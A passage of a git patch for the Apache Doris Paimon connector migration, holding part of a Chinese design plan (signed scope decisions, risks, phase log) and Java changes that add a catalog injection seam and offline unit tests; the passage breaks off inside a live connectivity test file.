静默回归)——**除非 D2 取「fail-loud 延后」则 B5 降为 fail-loud 守护**。 +- **翻闸前置硬门**:① live e2e(真实 paimon 各 flavor,用户跑)② FE→BE round-trip smoke ③ B0 parity baseline 绿 ④ D1/D2 已签字。 +- B6 独立可随时落(doc-only)。 + +--- + +## 🔱 开放决策(✅ 已签字 2026-06-09) + +> 镜像 P4 recon §9 SCOPE FORK。两项用户级决策已签字:**D1=A、D2=A**(均推荐方案)。下文保留 fork 全貌作追溯。 + +### D1 — flavor 装配模型 → ✅ **采纳 A(单 Catalog + flavor switch,MC 一致)** + +| 方案 | 范围 | 风险 | 推荐 | +|---|---|---|---| +| **A. 单 Catalog + flavor switch(MC 一致)** | `PaimonConnector.createCatalog` 内 switch on `paimon.catalog.type`,拷 warehouse/conf/authenticator 入模块 | 中(拷贝量 + Kerberos/S3/DLF/JDBC 正确性)| **✅ 推荐**:与 MC「拷常量入模块」一致、surface 小、无新模块 | +| B. 5 backend 模块 + ServiceLoader | 建 `fe-connector-paimon-api` + 4 backend + `PaimonBackendFactory` | 高(无 MC 先例、大 surface、空壳须从零建)| 仅当团队要忠于 legacy 拆分 | + +两方案都须把 `StorageProperties`/`HMSBaseProperties`/`HadoopExecutionAuthenticator`(fe-core/fe-common,禁 import)**从属性 map 重建或拷最小封装**;**每-flavor authenticator 必须保**。 + +### D2 — MTMV + MVCC scope(翻闸 gating)→ ✅ **采纳 A(P5 内实现 MTMV/MVCC 桥,B7 翻闸 gated on B5)** + +> cross-cut 硬结论:**禁**把翻闸当「full-adopter 完成」却无 MTMV 桥而静默读 latest。 + +| 方案 | 范围 | 翻闸门 | 推荐 | +|---|---|---|---| +| **A. P5 内实现 MTMV/MVCC 桥(B5)** | 落 `PaimonPluginDrivenExternalTable` + E5 wiring + GAP-LISTPART-AT-SNAPSHOT | B7 翻闸 gated on B5 | **✅ 推荐**:保留 legacy 全部 MTMV/时间旅行能力,真 full parity | +| B. 翻闸先行 + MTMV fail-loud 延后 | 翻闸只做普通读/DDL/sys-table;MTMV-base/time-travel 命中 SPI paimon 表**显式报错** | B7 不 gated on B5,但须 fail-loud 守护落地 | 若要尽快翻闸、可接受暂不支持 paimon-MTMV-base + 时间旅行 | + +无论 A/B,**禁止**静默读 latest 回归(B 方案的 fail-loud 守护本身是必交付项)。 + +### D3 — 次要确认(非 fork,记录默认) + +- sys-table rowcount:返 `UNKNOWN_ROW_COUNT`(对齐 iceberg,弃旧 `fetchRowCount` plan() 往返)—— 默认采纳。 +- sys-table branch="main" 限制:保留(非 main 分支 sys 表暂不支持)—— 默认采纳 + 文档。 +- 弃 `PaimonScanMetricsReporter`(连接器禁 import profile)→ EXPLAIN/profile paimon scan 指标回归 —— 登记为已知 behavior 回归。 +- COUNT 下推 / cpp-reader / history-schema:初版翻闸**延后**(仅 perf/edge parity,correctness 不丢)—— 默认采纳。 + +--- + +## 风险 / 开放问题 + +- **R-高|单-pin 不变式(MTMV)**:snapshotId 与分区集须同源;缺 GAP-LISTPART-AT-SNAPSHOT 则刷新 staleness keying 静默错位。 +- **R-高|`lastFileCreationTime()` 可靠性**:跨 HMS/DLF/REST/JDBC/filesystem catalog 是否填值 = SDK 行为,**源码不可验**;为 0/未设则 getPartitionSnapshot 出错时间戳→分区永不/永刷。须 live 验。 +- **R-高|MTMV 静默回归**:见 D2,禁静默读 latest。 +- **R-中|每-flavor authenticator 丢**:Kerberized HMS/HDFS DDL 运行时炸,无离线测覆盖。 +- **R-中|paimon-core 版本漂移** FE 连接器 vs BE scanner:InstantiationUtil 跨版本静默破;须 pin + round-trip smoke。 +- **R-中|classloader parent-first(R-004)**:paimon SDK 单一共享实例;多 flavor/版本 catalog 共存依赖 SDK 容忍度(开放)。 +- **R-中|GSON 7 注册**:漏 db→ClassCastException replay。 +- **开放|REFRESH TABLE seam**:`PluginDrivenExternalCatalog` 仅 REFRESH CATALOG 销 connector;REFRESH TABLE 是否触连接器 cache 未核 → 可能需 `invalidateTable` SPI。 +- **开放|BE sys-table `TTableDescriptor`**:旧发 HIVE_TABLE,PluginDriven 默认 SCHEMA_TABLE;须核 BE paimon-scanner 期望。 +- **开放|`isPartitionInvalid` parity**:基类 `TablePartitionValues` 是否静默丢失败转换计数。 +- **开放|JDBC flavor DriverShim/URLClassLoader** 在 parent-first 连接器 loader 下的归属。 + +--- + +## 阶段日志(倒序) + +### 2026-06-09(recon + 设计,0 产线代码) +- 14-agent code-grounded recon + cross-cut 对抗复审;产 `research/p5-paimon-migration-recon.md` + 本 doc。 +- firsthand 核实 4 个 load-bearing 锚点(SPI_READY_TYPES / GSON 7 注册 / PluginDrivenExternalTable 无 MTMV / ConnectorPartitionInfo.lastModifiedMillis 存在)。 +- 证伪 3 个先验:① Base64-blocker(BE 有 STD fallback `PaimonUtils:42-47`)② FE-dispatch-全缺(DROP/CREATE·DROP DB/SHOW PARTITIONS/TVF 已部分预接)③ 6-flavor-工厂-已建(backend 模块空壳)。 +- **用户签字 D1=A(单 Catalog + flavor switch)、D2=A(P5 内实现 MTMV/MVCC 桥)**;不再阻塞,可启动 B0→B9。 + +--- + +## 关联 + +- Master plan 章节:[§3.6](../00-connector-migration-master-plan.md) +- RFC 章节:[§(写/事务 SPI)](../01-spi-extensions-rfc.md)、`tasks/designs/connector-write-spi-rfc.md` +- 样板:[P4 maxcompute](./P4-maxcompute-migration.md)(full-adopter + cutover);recon `research/p4-maxcompute-migration-recon.md` +- 决策:**D-037(P5-D1 flavor=单 Catalog + switch,本 doc §开放决策 D1)**、**D-038(P5-D2 MTMV/MVCC P5 内实现,本 doc §开放决策 D2)** 已签字;D-005(HMS flavor 走 tableFormatType)、D-006(cache 放连接器内) +- 风险:R-004(classloader)、R-007(FE/BE 共享 jar)、R-012(snapshotId 类型) +- 连接器:[paimon](../connectors/paimon.md) +- recon:[p5-paimon-migration-recon](../research/p5-paimon-migration-recon.md) + +--- + +## 当前阻塞项 + +- 无硬阻塞(D1=A / D2=A 已签字 2026-06-09)。下一 session 可启动 B0(测试基建 + parity baseline,无前置)、B1(flavor 装配,单 Catalog 模型)、B6(procedure doc no-op)。 +- 翻闸(B7)仍 gated on B2+B3+B4+B5 全完 + live e2e(用户真实 paimon 各 flavor 环境)。 From f71bbcfa6a4eb1373070af3d9c9226de63140dd1 Mon Sep 17 00:00:00 2001 From: morningman Date: Tue, 9 Jun 2026 21:26:03 +0800 Subject: [PATCH 009/128] [test](connector) P5 paimon B0: test harness + parity baseline (T01-T02) T01: extract PaimonCatalogOps injection seam (5 read methods, B0 read-only) over the paimon SDK Catalog; refactor PaimonConnectorMetadata to inject it (6 call sites migrated, read path byte-for-byte unchanged); build the first fe-connector-paimon test module (no-mockito recording fake, mirroring MC's McStructureHelper): 9 metadata UTs pinning the databaseExists try/catch and the getColumnHandles reload-fallback, FakePaimonTable (fail-loud on non-read methods), and an env-gated live connectivity smoke. T02: R-007 paimon.version 3-way pin invariant comment (FE connector + BE paimon-scanner + preload-extensions already aligned at 1.3.1 via the single fe/pom.xml property); offline FE->BE serialized-Table round-trip smoke (real FileSystemCatalog -> connector encode -> BE-mirrored URL-first/STD-fallback decode, asserts rowType/partition/primary keys); parity-baseline doc inventorying the 41 existing regression suites as the after-cutover parity gate plus the real connector-side gaps and the live-e2e hard gate. Connector module: Tests run: 12, Failures: 0, Errors: 0, Skipped: 1 (the skip is the env-gated live test); checkstyle 0; import-gate clean. Co-Authored-By: Claude Opus 4.8 (1M context) --- fe/fe-connector/fe-connector-paimon/pom.xml | 13 + .../connector/paimon/PaimonCatalogOps.java | 87 +++++++ .../connector/paimon/PaimonConnector.java | 3 +- .../paimon/PaimonConnectorMetadata.java | 18 +- .../connector/paimon/FakePaimonTable.java | 225 ++++++++++++++++++ .../paimon/PaimonConnectorMetadataTest.java | 210 ++++++++++++++++ .../paimon/PaimonLiveConnectivityTest.java | 69 ++++++ .../paimon/PaimonTableSerdeRoundTripTest.java | 193 +++++++++++++++ .../paimon/RecordingPaimonCatalogOps.java | 88 +++++++ fe/pom.xml | 7 + plan-doc/HANDOFF.md | 57 +++-- .../research/p5-paimon-parity-baseline.md | 160 +++++++++++++ plan-doc/tasks/P5-paimon-migration.md | 16 +- 13 files changed, 1103 insertions(+), 43 deletions(-) create mode 100644 fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/FakePaimonTable.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonLiveConnectivityTest.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonTableSerdeRoundTripTest.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java create mode 100644 plan-doc/research/p5-paimon-parity-baseline.md diff --git a/fe/fe-connector/fe-connector-paimon/pom.xml b/fe/fe-connector/fe-connector-paimon/pom.xml index 1810e30be08e4b..85b1ab4aee07af 100644 --- a/fe/fe-connector/fe-connector-paimon/pom.xml +++ b/fe/fe-connector/fe-connector-paimon/pom.xml @@ -79,6 +79,19 @@ under the License. junit-jupiter test + + + + org.apache.paimon + paimon-format + test + diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java new file mode 100644 index 00000000000000..ec7dd086c48c28 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java @@ -0,0 +1,87 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.paimon.catalog.Catalog; +import org.apache.paimon.catalog.Database; +import org.apache.paimon.catalog.Identifier; +import org.apache.paimon.table.Table; + +import java.util.List; + +/** + * Injection seam over the remote Paimon {@link Catalog} read calls. + * + *

The default {@link CatalogBackedPaimonCatalogOps} simply delegates to a real + * {@code Catalog}, which requires a live remote catalog (filesystem / HMS / DLF / REST / + * JDBC). By depending on this interface instead of {@code Catalog} directly, + * {@link PaimonConnectorMetadata} becomes unit-testable offline with a hand-written + * recording fake (no Mockito) — mirroring the maxcompute connector's + * {@link org.apache.doris.connector.maxcompute.McStructureHelper McStructureHelper} pattern. + * + *

B0 scope is strictly read-only; later batches grow this seam with DDL methods. + */ +public interface PaimonCatalogOps { + + List listDatabases(); + + Database getDatabase(String name) throws Catalog.DatabaseNotExistException; + + List listTables(String databaseName) throws Catalog.DatabaseNotExistException; + + Table getTable(Identifier identifier) throws Catalog.TableNotExistException; + + void close() throws Exception; + + /** + * Default implementation backing the seam with a real Paimon {@link Catalog}. + * Each method is a thin delegation; the {@code Catalog} is the only state. + */ + class CatalogBackedPaimonCatalogOps implements PaimonCatalogOps { + private final Catalog catalog; + + public CatalogBackedPaimonCatalogOps(Catalog catalog) { + this.catalog = catalog; + } + + @Override + public List listDatabases() { + return catalog.listDatabases(); + } + + @Override + public Database getDatabase(String name) throws Catalog.DatabaseNotExistException { + return catalog.getDatabase(name); + } + + @Override + public List listTables(String databaseName) throws Catalog.DatabaseNotExistException { + return catalog.listTables(databaseName); + } + + @Override + public Table getTable(Identifier identifier) throws Catalog.TableNotExistException { + return catalog.getTable(identifier); + } + + @Override + public void close() throws Exception { + catalog.close(); + } + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java index 2ac035e20493a2..e9076b9c6938dc 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java @@ -53,7 +53,8 @@ public PaimonConnector(Map properties) { @Override public ConnectorMetadata getMetadata(ConnectorSession session) { - return new PaimonConnectorMetadata(ensureCatalog(), properties); + return new PaimonConnectorMetadata( + new PaimonCatalogOps.CatalogBackedPaimonCatalogOps(ensureCatalog()), properties); } @Override diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java index 8f190da564381b..5463f2c1e80d0e 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java @@ -52,18 +52,18 @@ public class PaimonConnectorMetadata implements ConnectorMetadata { private static final Logger LOG = LogManager.getLogger(PaimonConnectorMetadata.class); - private final Catalog catalog; + private final PaimonCatalogOps catalogOps; private final PaimonTypeMapping.Options typeMappingOptions; - public PaimonConnectorMetadata(Catalog catalog, Map properties) { - this.catalog = catalog; + public PaimonConnectorMetadata(PaimonCatalogOps catalogOps, Map properties) { + this.catalogOps = catalogOps; this.typeMappingOptions = buildTypeMappingOptions(properties); } @Override public List listDatabaseNames(ConnectorSession session) { try { - return catalog.listDatabases(); + return catalogOps.listDatabases(); } catch (Exception e) { LOG.warn("Failed to list Paimon databases", e); return Collections.emptyList(); @@ -73,7 +73,7 @@ public List listDatabaseNames(ConnectorSession session) { @Override public boolean databaseExists(ConnectorSession session, String dbName) { try { - catalog.getDatabase(dbName); + catalogOps.getDatabase(dbName); return true; } catch (Catalog.DatabaseNotExistException e) { return false; @@ -83,7 +83,7 @@ public boolean databaseExists(ConnectorSession session, String dbName) { @Override public List listTableNames(ConnectorSession session, String dbName) { try { - return catalog.listTables(dbName); + return catalogOps.listTables(dbName); } catch (Catalog.DatabaseNotExistException e) { LOG.warn("Database does not exist: {}", dbName); return Collections.emptyList(); @@ -98,7 +98,7 @@ public Optional getTableHandle( ConnectorSession session, String dbName, String tableName) { Identifier identifier = Identifier.create(dbName, tableName); try { - Table table = catalog.getTable(identifier); + Table table = catalogOps.getTable(identifier); List partitionKeys = table.partitionKeys(); List primaryKeys = table.primaryKeys(); PaimonTableHandle handle = new PaimonTableHandle( @@ -122,7 +122,7 @@ public ConnectorTableSchema getTableSchema( Identifier identifier = Identifier.create( paimonHandle.getDatabaseName(), paimonHandle.getTableName()); try { - Table table = catalog.getTable(identifier); + Table table = catalogOps.getTable(identifier); RowType rowType = table.rowType(); List primaryKeys = table.primaryKeys(); List columns = mapFields(rowType, primaryKeys); @@ -164,7 +164,7 @@ public Map getColumnHandles( Identifier id = Identifier.create( paimonHandle.getDatabaseName(), paimonHandle.getTableName()); try { - table = catalog.getTable(id); + table = catalogOps.getTable(id); } catch (Exception e) { throw new RuntimeException("Failed to load Paimon table: " + id, e); } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/FakePaimonTable.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/FakePaimonTable.java new file mode 100644 index 00000000000000..d09e048eecac52 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/FakePaimonTable.java @@ -0,0 +1,225 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.paimon.Snapshot; +import org.apache.paimon.fs.FileIO; +import org.apache.paimon.manifest.IndexManifestEntry; +import org.apache.paimon.manifest.ManifestEntry; +import org.apache.paimon.manifest.ManifestFileMeta; +import org.apache.paimon.stats.Statistics; +import org.apache.paimon.table.ExpireSnapshots; +import org.apache.paimon.table.Table; +import org.apache.paimon.table.sink.BatchWriteBuilder; +import org.apache.paimon.table.sink.StreamWriteBuilder; +import org.apache.paimon.table.source.ReadBuilder; +import org.apache.paimon.types.RowType; +import org.apache.paimon.utils.SimpleFileReader; + +import java.time.Duration; +import java.util.List; +import java.util.Map; +import java.util.Optional; + +/** + * Minimal offline {@link Table} double for unit tests. Only the metadata read calls that + * {@link PaimonConnectorMetadata} actually exercises — {@link #rowType()}, + * {@link #partitionKeys()}, {@link #primaryKeys()} — return controlled values; every other + * method throws {@link UnsupportedOperationException}. + * + *

Throwing on the rest is deliberate: it documents that the metadata read path must touch + * nothing else, and a future change that starts depending on (say) {@code newReadBuilder()} in + * the read-only metadata path would blow up loudly in the test instead of silently passing. + */ +final class FakePaimonTable implements Table { + + private final String name; + private final RowType rowType; + private final List partitionKeys; + private final List primaryKeys; + + FakePaimonTable(String name, RowType rowType, + List partitionKeys, List primaryKeys) { + this.name = name; + this.rowType = rowType; + this.partitionKeys = partitionKeys; + this.primaryKeys = primaryKeys; + } + + @Override + public String name() { + return name; + } + + @Override + public RowType rowType() { + return rowType; + } + + @Override + public List partitionKeys() { + return partitionKeys; + } + + @Override + public List primaryKeys() { + return primaryKeys; + } + + // ---- everything below is outside the metadata read path: fail loud if ever called ---- + + @Override + public Map options() { + throw new UnsupportedOperationException(); + } + + @Override + public Optional comment() { + throw new UnsupportedOperationException(); + } + + @Override + public Optional statistics() { + throw new UnsupportedOperationException(); + } + + @Override + public FileIO fileIO() { + throw new UnsupportedOperationException(); + } + + @Override + public Table copy(Map dynamicOptions) { + throw new UnsupportedOperationException(); + } + + @Override + public Optional latestSnapshot() { + throw new UnsupportedOperationException(); + } + + @Override + public Snapshot snapshot(long snapshotId) { + throw new UnsupportedOperationException(); + } + + @Override + public SimpleFileReader manifestListReader() { + throw new UnsupportedOperationException(); + } + + @Override + public SimpleFileReader manifestFileReader() { + throw new UnsupportedOperationException(); + } + + @Override + public SimpleFileReader indexManifestFileReader() { + throw new UnsupportedOperationException(); + } + + @Override + public void rollbackTo(long snapshotId) { + throw new UnsupportedOperationException(); + } + + @Override + public void createTag(String tagName, long fromSnapshotId) { + throw new UnsupportedOperationException(); + } + + @Override + public void createTag(String tagName, long fromSnapshotId, Duration timeRetained) { + throw new UnsupportedOperationException(); + } + + @Override + public void createTag(String tagName) { + throw new UnsupportedOperationException(); + } + + @Override + public void createTag(String tagName, Duration timeRetained) { + throw new UnsupportedOperationException(); + } + + @Override + public void renameTag(String tagName, String targetTagName) { + throw new UnsupportedOperationException(); + } + + @Override + public void replaceTag(String tagName, Long fromSnapshotId, Duration timeRetained) { + throw new UnsupportedOperationException(); + } + + @Override + public void deleteTag(String tagName) { + throw new UnsupportedOperationException(); + } + + @Override + public void rollbackTo(String tagName) { + throw new UnsupportedOperationException(); + } + + @Override + public void createBranch(String branchName) { + throw new UnsupportedOperationException(); + } + + @Override + public void createBranch(String branchName, String tagName) { + throw new UnsupportedOperationException(); + } + + @Override + public void deleteBranch(String branchName) { + throw new UnsupportedOperationException(); + } + + @Override + public void fastForward(String branchName) { + throw new UnsupportedOperationException(); + } + + @Override + public ExpireSnapshots newExpireSnapshots() { + throw new UnsupportedOperationException(); + } + + @Override + public ExpireSnapshots newExpireChangelog() { + throw new UnsupportedOperationException(); + } + + @Override + public ReadBuilder newReadBuilder() { + throw new UnsupportedOperationException(); + } + + @Override + public BatchWriteBuilder newBatchWriteBuilder() { + throw new UnsupportedOperationException(); + } + + @Override + public StreamWriteBuilder newStreamWriteBuilder() { + throw new UnsupportedOperationException(); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java new file mode 100644 index 00000000000000..c4a807fc6b30f8 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java @@ -0,0 +1,210 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.handle.ConnectorColumnHandle; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; + +import org.apache.paimon.types.DataTypes; +import org.apache.paimon.types.RowType; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Arrays; +import java.util.Collections; +import java.util.List; +import java.util.Map; +import java.util.Optional; + +/** + * Characterization tests for {@link PaimonConnectorMetadata}, pinning the read-path behavior + * after the {@link PaimonCatalogOps} seam extraction (B0). + * + *

The seam fully covers every remote {@code Catalog} call the metadata makes, so each test + * drives a {@link RecordingPaimonCatalogOps} fake and builds the metadata with a {@code null} + * real catalog — the tests are entirely offline (no live remote catalog), which is the whole + * point of introducing the seam. + */ +public class PaimonConnectorMetadataTest { + + private static PaimonConnectorMetadata metadataWith(RecordingPaimonCatalogOps ops) { + return new PaimonConnectorMetadata(ops, Collections.emptyMap()); + } + + private static RowType rowType(String... columnNames) { + RowType.Builder builder = RowType.builder(); + for (String name : columnNames) { + builder.field(name, DataTypes.INT()); + } + return builder.build(); + } + + @Test + public void listDatabaseNamesDelegatesToOps() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.databases = Arrays.asList("db_a", "db_b"); + + List result = metadataWith(ops).listDatabaseNames(null); + + // WHY: listDatabaseNames must return exactly what the remote catalog reports, in order; + // it is the only source of the catalog's database list shown to users. + // MUTATION: returning Collections.emptyList() (dropping the delegation) -> red. + Assertions.assertEquals(Arrays.asList("db_a", "db_b"), result); + Assertions.assertEquals(Collections.singletonList("listDatabases"), ops.log, + "listDatabaseNames must make exactly one listDatabases() call on the seam"); + } + + @Test + public void databaseExistsTrueWhenGetDatabaseSucceeds() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + + boolean exists = metadataWith(ops).databaseExists(null, "db1"); + + // WHY: existence is defined as "getDatabase did not throw NotExist". A successful + // getDatabase must map to true. MUTATION: returning false on success -> red. + Assertions.assertTrue(exists); + Assertions.assertEquals(Collections.singletonList("getDatabase:db1"), ops.log); + } + + @Test + public void databaseExistsFalseWhenGetDatabaseThrowsNotExist() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.throwDatabaseNotExist = true; + + boolean exists = metadataWith(ops).databaseExists(null, "ghost"); + + // WHY: the contract is that DatabaseNotExistException means "absent" (false), NOT a + // thrown error to the caller. MUTATION: removing the catch (letting the exception + // propagate) or returning true -> red. This is exactly the branch a recording fake can + // exercise but a live-catalog test cannot reliably force. + Assertions.assertFalse(exists); + } + + @Test + public void listTableNamesDelegatesToOps() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.tables = Arrays.asList("t1", "t2"); + + List result = metadataWith(ops).listTableNames(null, "db1"); + + // WHY: listTableNames must surface exactly the remote table list for the given db. + // MUTATION: returning emptyList (dropping delegation) -> red. + Assertions.assertEquals(Arrays.asList("t1", "t2"), result); + Assertions.assertEquals(Collections.singletonList("listTables:db1"), ops.log); + } + + @Test + public void listTableNamesReturnsEmptyWhenDatabaseMissing() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.throwDatabaseNotExist = true; + + List result = metadataWith(ops).listTableNames(null, "ghost"); + + // WHY: a missing database must degrade to an empty list, not propagate the checked + // DatabaseNotExistException to the SPI caller. MUTATION: removing that catch -> red. + Assertions.assertTrue(result.isEmpty()); + } + + @Test + public void getTableHandleCarriesPartitionAndPrimaryKeysAndSetsTransientTable() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + FakePaimonTable table = new FakePaimonTable( + "t1", + rowType("id", "dt", "region"), + Arrays.asList("dt", "region"), + Collections.singletonList("id")); + ops.table = table; + + Optional handleOpt = metadataWith(ops).getTableHandle(null, "db1", "t1"); + + Assertions.assertTrue(handleOpt.isPresent()); + PaimonTableHandle handle = (PaimonTableHandle) handleOpt.get(); + // WHY: partition/primary keys are the serializable identity the FE later relies on for + // partition pruning and bucketing; they MUST be copied from the live table onto the + // handle. MUTATION: hardcoding emptyList for either -> red. + Assertions.assertEquals(Arrays.asList("dt", "region"), handle.getPartitionKeys(), + "partition keys must be carried from the Paimon table onto the handle"); + Assertions.assertEquals(Collections.singletonList("id"), handle.getPrimaryKeys(), + "primary keys must be carried from the Paimon table onto the handle"); + // WHY: the transient Table is the fast path used by getColumnHandles; failing to set it + // would force an extra remote reload on every column lookup. MUTATION: dropping + // handle.setPaimonTable(table) -> getPaimonTable() is null -> red. + Assertions.assertSame(table, handle.getPaimonTable(), + "the resolved Paimon table must be stashed on the handle as the transient ref"); + } + + @Test + public void getTableHandleEmptyWhenTableMissing() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.throwTableNotExist = true; + + Optional handleOpt = metadataWith(ops).getTableHandle(null, "db1", "ghost"); + + // WHY: a missing table is an absent handle (Optional.empty), not a thrown error. + // MUTATION: removing the TableNotExistException catch -> red. + Assertions.assertFalse(handleOpt.isPresent()); + } + + @Test + public void getColumnHandlesReloadFallbackReloadsWhenTransientTableNull() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.table = new FakePaimonTable( + "t1", + rowType("id", "name"), + Collections.emptyList(), + Collections.emptyList()); + // A handle whose transient Table is null (e.g. after serialization across the FE/BE + // boundary) — the metadata must reload via the seam rather than NPE. + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + Assertions.assertNull(handle.getPaimonTable(), "precondition: transient table is null"); + + Map handles = metadataWith(ops).getColumnHandles(null, handle); + + // WHY: this is the reload-fallback safety net. With a null transient Table, the only way + // to get column handles is to re-fetch the table from the catalog seam. MUTATION: + // removing the `if (table == null) { table = ops.getTable(id); }` block -> NPE on + // table.rowType() -> red. The recorded getTable call proves the reload happened. + Assertions.assertEquals(Arrays.asList("id", "name"), new java.util.ArrayList<>(handles.keySet()), + "column handles must be derived from the reloaded table's row type, in order"); + Assertions.assertTrue(ops.log.contains("getTable:db1.t1"), + "reload-fallback must re-fetch the table from the seam when the transient ref is null"); + } + + @Test + public void getColumnHandlesUsesTransientTableWithoutReload() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + FakePaimonTable table = new FakePaimonTable( + "t1", + rowType("id", "name"), + Collections.emptyList(), + Collections.emptyList()); + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + handle.setPaimonTable(table); + + Map handles = metadataWith(ops).getColumnHandles(null, handle); + + // WHY: the fast path — when the transient Table is already present, getColumnHandles must + // use it and NOT make a redundant remote getTable call. MUTATION: always reloading would + // record a getTable entry -> red. This pins the reload as a fallback, not the default. + Assertions.assertEquals(Arrays.asList("id", "name"), new java.util.ArrayList<>(handles.keySet())); + Assertions.assertTrue(ops.log.isEmpty(), + "with a present transient table, no remote getTable reload must happen"); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonLiveConnectivityTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonLiveConnectivityTest.java new file mode 100644 index 00000000000000..0227193c40b4b7 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonLiveConnectivityTest.java @@ -0,0 +1,69 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.ConnectorMetadata; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Assumptions; +import org.junit.jupiter.api.Test; + +import java.util.HashMap; +import java.util.Map; + +/** + * Live Paimon connectivity smoke (warehouse required; 